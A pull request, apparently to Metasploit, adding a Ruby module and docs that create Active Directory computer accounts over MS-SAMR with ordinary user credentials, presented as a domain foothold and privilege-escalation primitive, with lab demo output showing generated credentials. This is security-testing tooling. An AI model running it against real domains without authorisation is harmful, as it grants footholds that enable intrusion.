### PR TITLE
Add module for adding/deleting computers via MS-SAMR

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -445,7 +445,7 @@ GEM
     ruby-progressbar (1.11.0)
     ruby-rc4 (0.1.5)
     ruby2_keywords (0.0.5)
-    ruby_smb (3.1.3)
+    ruby_smb (3.1.5)
       bindata
       openssl-ccm
       openssl-cmac

--- a/documentation/modules/auxiliary/admin/dcerpc/samr_computer.md
+++ b/documentation/modules/auxiliary/admin/dcerpc/samr_computer.md
@@ -1,0 +1,100 @@
+## Vulnerable Application
+Add, lookup and delete computer accounts via MS-SAMR. By default standard active directory users can add up to 10 new
+computers to the domain. Administrative privileges however are required to delete the created accounts.
+
+## Verification Steps
+
+1. From msfconsole
+2. Do: `use auxiliary/admin/dcerpc/samr_computer`
+3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
+   1. Set the `COMPUTER_NAME` option for `DELETE_COMPUTER` and `LOOKUP_COMPUTER` actions
+4. Run the module and see that a new machine account was added
+
+## Options
+
+### SMBDomain
+
+The Windows domain to use for authentication. If the target server has more than one domain present on it, this option
+must be set to the target domain. If the target server has only one domain present on it, the domain will automatically
+be identified.
+
+### COMPUTER_NAME
+
+The computer name to add, lookup or delete. This option is optional for the `ADD_COMPUTER` action, and required for the
+`LOOKUP_COMPUTER` and `DELETE_COMPUTER` actions.
+
+### COMPUTER_PASSWORD
+
+The password for the new computer. This option is only used for the `ADD_COMPUTER` action. If left blank, a random value
+will be generated.
+
+## Actions
+
+### ADD_COMPUTER
+
+Add a new computer to the domain. This action will fail with status `STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED` if the
+user has exceeded the maximum number of computer accounts that they are allowed to create.
+
+After the computer account is created, the password will be set for it. If `COMPUTER_NAME` is set, that value will be
+used and the module will fail if the selected name is already in use. If `COMPUTER_NAME` is *not* set, a random value
+will be used.
+
+### DELETE_COMPUTER
+
+Delete a computer from the domain. This action requires that the `COMPUTER_NAME` option be set.
+
+### LOOKUP_COMPUTER
+
+Lookup a computer in the domain. This action verifies that the specified computer exists, and looks up its security ID
+(SID), which includes the relative ID (RID) as the last component.
+
+## Scenarios
+
+### Windows Server 2019
+
+First, a new computer account is created and its details are logged to the database.
+
+```
+msf6 auxiliary(admin/dcerpc/samr_computer) > set RHOSTS 192.168.159.96
+RHOSTS => 192.168.159.96
+msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBPass Password1
+SMBPass => Password1
+msf6 auxiliary(admin/dcerpc/samr_computer) > show options 
+
+Module options (auxiliary/admin/dcerpc/samr_computer):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   COMPUTER_NAME                   no        The computer name
+   RHOSTS         192.168.159.96   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT          445              yes       The target port (TCP)
+   SMBDomain      .                no        The Windows domain to use for authentication
+   SMBPass        Password1        no        The password for the specified username
+   SMBUser        aliddle          no        The username to authenticate as
+
+
+Auxiliary action:
+
+   Name          Description
+   ----          -----------
+   ADD_COMPUTER  Add a computer account
+
+
+msf6 auxiliary(admin/dcerpc/samr_computer) > run
+[*] Running module against 192.168.159.96
+
+[*] 192.168.159.96:445 - Using automatically identified domain: MSFLAB
+[+] 192.168.159.96:445 - Successfully created MSFLAB\DESKTOP-2X8F54QG$ with password MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/samr_computer) > creds
+Credentials
+===========
+
+host            origin          service        public             private                           realm   private_type  JtR Format
+----            ------          -------        ------             -------                           -----   ------------  ----------
+192.168.159.96  192.168.159.96  445/tcp (smb)  DESKTOP-2X8F54QG$  MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY  MSFLAB  Password      
+
+msf6 auxiliary(admin/dcerpc/samr_computer) >
+```

--- a/documentation/modules/auxiliary/admin/dcerpc/samr_computer.md
+++ b/documentation/modules/auxiliary/admin/dcerpc/samr_computer.md
@@ -14,9 +14,8 @@ computers to the domain. Administrative privileges however are required to delet
 
 ### SMBDomain
 
-The Windows domain to use for authentication. If the target server has more than one domain present on it, this option
-must be set to the target domain. If the target server has only one domain present on it, the domain will automatically
-be identified.
+The Windows domain to use for authentication. The domain will automatically be identified if this option is left in its
+default value.
 
 ### COMPUTER_NAME
 
@@ -65,14 +64,15 @@ msf6 auxiliary(admin/dcerpc/samr_computer) > show options
 
 Module options (auxiliary/admin/dcerpc/samr_computer):
 
-   Name           Current Setting  Required  Description
-   ----           ---------------  --------  -----------
-   COMPUTER_NAME                   no        The computer name
-   RHOSTS         192.168.159.96   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
-   RPORT          445              yes       The target port (TCP)
-   SMBDomain      .                no        The Windows domain to use for authentication
-   SMBPass        Password1        no        The password for the specified username
-   SMBUser        aliddle          no        The username to authenticate as
+   Name               Current Setting  Required  Description
+   ----               ---------------  --------  -----------
+   COMPUTER_NAME                       no        The computer name
+   COMPUTER_PASSWORD                   no        The password for the new computer
+   RHOSTS             192.168.159.96   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT              445              yes       The target port (TCP)
+   SMBDomain          .                no        The Windows domain to use for authentication
+   SMBPass            Password1        no        The password for the specified username
+   SMBUser            aliddle          no        The username to authenticate as
 
 
 Auxiliary action:

--- a/modules/auxiliary/admin/dcerpc/samr_computer.rb
+++ b/modules/auxiliary/admin/dcerpc/samr_computer.rb
@@ -1,0 +1,81 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'ruby_smb/dcerpc/client'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::SMB::Client::Authenticated
+  include Msf::Exploit::Remote::DCERPC
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SAMR Computer Management',
+        'Description' => %q{
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Alberto Solino', # Original Impacket code # todo: verify this author credit
+          'Spencer McIntyre',
+        ],
+        'References' => [
+          ['URL', 'https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py'],
+        ],
+        'Notes' => {
+          'Reliability' => [],
+          'Stability' => [],
+          'SideEffects' => [ IOC_IN_LOGS ]
+        },
+        'Actions' => [
+          [ 'ADD', { 'Description' => 'Add a computer account' } ],
+        ],
+        'DefaultAction' => 'ADD'
+      )
+    )
+
+    register_options([ Opt::RPORT(445) ])
+  end
+
+  def connect_samr
+    vprint_status('Connecting to Security Account Manager (SAM) Remote Protocol')
+    samr = @tree.open_file(filename: 'samr', write: true, read: true)
+
+    vprint_status('Binding to \\samr...')
+    samr.bind(endpoint: RubySMB::Dcerpc::Samr)
+    vprint_good('Bound to \\samr')
+
+    samr
+  end
+
+  def run
+    connect
+    begin
+      smb_login
+    rescue Rex::Proto::SMB::Exceptions::Error, RubySMB::Error::RubySMBError => e
+      fail_with(Module::Failure::NoAccess, "Unable to authenticate ([#{e.class}] #{e}).")
+    end
+    report_service(
+      host: rhost,
+      port: rport,
+      host_name: simple.client.default_name,
+      proto: 'tcp',
+      name: 'smb',
+      info: "Module: #{fullname}, last negotiated version: SMBv#{simple.client.negotiated_smb_version} (dialect = #{simple.client.dialect})"
+    )
+
+    begin
+      @tree = simple.client.tree_connect("\\\\#{sock.peerhost}\\IPC$")
+    rescue RubySMB::Error::RubySMBError => e
+      fail_with(Module::Failure::Unreachable, "Unable to connect to the remote IPC$ share ([#{e.class}] #{e}).")
+    end
+
+    samr = connect_samr
+    server_handle = samr.samr_connect(access: 0x30)
+    domains = samr.samr_enumerate_domains_in_sam_server(server_handle: server_handle)
+    print_status(domains.inspect)
+  end
+end

--- a/modules/auxiliary/admin/dcerpc/samr_computer.rb
+++ b/modules/auxiliary/admin/dcerpc/samr_computer.rb
@@ -31,13 +31,16 @@ class MetasploitModule < Msf::Auxiliary
           'SideEffects' => [ IOC_IN_LOGS ]
         },
         'Actions' => [
-          [ 'ADD', { 'Description' => 'Add a computer account' } ],
+          [ 'ADD_COMPUTER', { 'Description' => 'Add a computer account' } ],
         ],
-        'DefaultAction' => 'ADD'
+        'DefaultAction' => 'ADD_COMPUTER'
       )
     )
 
-    register_options([ Opt::RPORT(445) ])
+    register_options([
+      OptString.new('COMPUTER_NAME', [ false, 'The computer name' ]),
+      Opt::RPORT(445)
+    ])
   end
 
   def connect_samr
@@ -73,9 +76,120 @@ class MetasploitModule < Msf::Auxiliary
       fail_with(Module::Failure::Unreachable, "Unable to connect to the remote IPC$ share ([#{e.class}] #{e}).")
     end
 
-    samr = connect_samr
-    server_handle = samr.samr_connect(access: 0x30)
-    domains = samr.samr_enumerate_domains_in_sam_server(server_handle: server_handle)
-    print_status(domains.inspect)
+    @samr = connect_samr
+    @server_handle = @samr.samr_connect
+
+    if datastore['SMBDomain'].blank? || datastore['SMBDomain'] == '.'
+      all_domains = @samr.samr_enumerate_domains_in_sam_server(server_handle: @server_handle).map(&:to_s).map(&:encode)
+      all_domains.delete('Builtin')
+      if all_domains.length == 0
+        fail_with(Failure::NotFound, 'No domains were found on the SAM server.')
+      elsif all_domains.length > 1
+        print_status("Enumerated domains: #{all_domains.join(', ')}")
+        fail_with(Failure::BadConfig, 'The SAM server has more than one domain, the target must be specified.')
+      end
+
+      @domain_name = all_domains.first
+      print_status("Using automatically identified domain: #{@domain_name}")
+    else
+      @domain_name = datastore['SMBDomain']
+    end
+
+    @domain_sid = @samr.samr_lookup_domain(server_handle: @server_handle, name: @domain_name)
+    @domain_handle = @samr.samr_open_domain(server_handle: @server_handle, domain_id: @domain_sid)
+    send("action_#{action.name.downcase}")
+  end
+
+  def random_hostname(prefix: 'DESKTOP')
+    "#{prefix}-#{Rex::Text.rand_base(8, '', ('A'..'Z').to_a + ('0'..'9').to_a)}$"
+  end
+
+  def action_add_computer
+    if datastore['COMPUTER_NAME'].blank?
+      computer_name = random_hostname
+      4.downto(0) do |attempt|
+        break if @samr.samr_lookup_names_in_domain(domain_handle: @domain_handle, names: [ computer_name ]).nil?
+
+        computer_name = random_hostname
+        fail_with(Failure::BadConfig, 'Could not find an unused computer name.') if attempt == 0
+      end
+    else
+      computer_name = datastore['COMPUTER_NAME']
+      if @samr.samr_lookup_names_in_domain(domain_handle: @domain_handle, names: [ computer_name ])
+        fail_with(Failure::BadConfig, 'The specified computer name already exists.')
+      end
+    end
+
+    result = @samr.samr_create_user2_in_domain(
+      domain_handle: @domain_handle,
+      name: computer_name,
+      account_type: RubySMB::Dcerpc::Samr::USER_WORKSTATION_TRUST_ACCOUNT,
+      desired_access: RubySMB::Dcerpc::Samr::USER_FORCE_PASSWORD_CHANGE | RubySMB::Dcerpc::Samr::MAXIMUM_ALLOWED
+    )
+
+    user_handle = result[:user_handle]
+    password = Rex::Text.rand_text_alphanumeric(32)
+
+    user_info = RubySMB::Dcerpc::Samr::SamprUserInfoBuffer.new(
+      tag: RubySMB::Dcerpc::Samr::USER_INTERNAL4_INFORMATION_NEW,
+      member: RubySMB::Dcerpc::Samr::SamprUserInternal4InformationNew.new(
+        i1: {
+          password_expired: 1,
+          which_fields: RubySMB::Dcerpc::Samr::USER_ALL_NTPASSWORDPRESENT | RubySMB::Dcerpc::Samr::USER_ALL_PASSWORDEXPIRED
+        },
+        user_password: {
+          buffer: RubySMB::Dcerpc::Samr::SamprEncryptedUserPasswordNew.encrypt_password(
+            password,
+            @simple.client.application_key.blank? ? @simple.client.session_key : @simple.client.application_key
+          )
+        }
+      )
+    )
+    @samr.samr_set_information_user2(
+      user_handle: user_handle,
+      user_info: user_info
+    )
+
+    user_info = RubySMB::Dcerpc::Samr::SamprUserInfoBuffer.new(
+      tag: RubySMB::Dcerpc::Samr::USER_CONTROL_INFORMATION,
+      member: RubySMB::Dcerpc::Samr::UserControlInformation.new(
+        user_account_control: RubySMB::Dcerpc::Samr::USER_WORKSTATION_TRUST_ACCOUNT
+      )
+    )
+    @samr.samr_set_information_user2(
+      user_handle: user_handle,
+      user_info: user_info
+    )
+    print_good("Successfully created #{@domain_name}\\#{computer_name} with password #{password}")
+    report_creds(@domain_name, computer_name, password)
+  end
+
+  def report_creds(domain, username, password)
+    service_data = {
+      address: datastore['RHOST'],
+      port: datastore['RPORT'],
+      service_name: 'smb',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: fullname,
+      origin_type: :service,
+      private_data: password,
+      private_type: :password,
+      username: username,
+      realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
+      realm_value: domain
+    }.merge(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+      core: credential_core,
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }.merge(service_data)
+
+    create_credential_login(login_data)
   end
 end


### PR DESCRIPTION
This adds a new auxiliary/admin module that can be used to add, lookup and delete computer accounts from an active directory domain. By default standard AD users can add up to 10 computers to the domain. When a user has access to do this (such as via plaintext credentials at the moment), the computer account can offer a sort of foothold into the domain. It's also becoming a common attack primitive in [certain scenarios](https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html).

Because there's typically a limited number of computers a user can add, the module's `ADD_COMPUTER` action will fail with `STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED` if used repeatedly. Also, while a standard user can create a computer account, additional privileges are required to delete it.

This requires the changes from rapid7/ruby_smb#231

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use auxiliary/admin/dcerpc/samr_computer`
- [ ] Set the `RHOSTS`, `SMBUser` and `SMBPass` options (`SMBDomain` is only required if the target has more than one domain on it)
- [ ] Run the `ADD_COMPUTER` action
    - [ ] A new computer will be created in the domain, the password printed to the screen and stored in the credentials table (as visible with `creds`)
- [ ] Set `COMPUTER_NAME` to the name of the new computer account
- [ ] Run the `LOOKUP_COMPUTER` action, see that the computer exists, and the SID is resolved
- [ ] Run the `DELETE_COMPUTER` action, see that the computer is deleted (**this action requires more privileges**, use a DA or other elevated account)
- [ ] Run the `LOOKUP_COMPUTER` action, see that the computer does not exist any more

The `ADD_COMPUTER` action makes a DCERPC request to set the password that uses application-layer encryption using either the session key or the application key from the underlying SMB transport. I tested this action using SMB 2, and SMB 3 both with and without transport-level encryption. The application key is only set for SMBv3 dialects. The module will use the application key when it's generated otherwise it'll use the session key. The SMB version and encryption settings can be configured through the `SMB::ProtocolVersion` and `SMB::AlwaysEncrypt` advanced datastore options.

## Demo

```
msf6 auxiliary(admin/dcerpc/samr_computer) > set RHOSTS 192.168.159.96
RHOSTS => 192.168.159.96
msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBUser aliddle
SMBUser => aliddle
msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBPass Password1
SMBPass => Password1
msf6 auxiliary(admin/dcerpc/samr_computer) > show options 
Module options (auxiliary/admin/dcerpc/samr_computer):
   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   COMPUTER_NAME                   no        The computer name
   RHOSTS         192.168.159.96   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        The Windows domain to use for authentication
   SMBPass        Password1        no        The password for the specified username
   SMBUser        aliddle          no        The username to authenticate as
Auxiliary action:
   Name          Description
   ----          -----------
   ADD_COMPUTER  Add a computer account
msf6 auxiliary(admin/dcerpc/samr_computer) > run
[*] Running module against 192.168.159.96
[*] 192.168.159.96:445 - Using automatically identified domain: MSFLAB
[+] 192.168.159.96:445 - Successfully created MSFLAB\DESKTOP-2X8F54QG$ with password MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/samr_computer) > creds
Credentials
===========
host            origin          service        public             private                           realm   private_type  JtR Format
----            ------          -------        ------             -------                           -----   ------------  ----------
192.168.159.96  192.168.159.96  445/tcp (smb)  DESKTOP-2X8F54QG$  MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY  MSFLAB  Password      
msf6 auxiliary(admin/dcerpc/samr_computer) >
```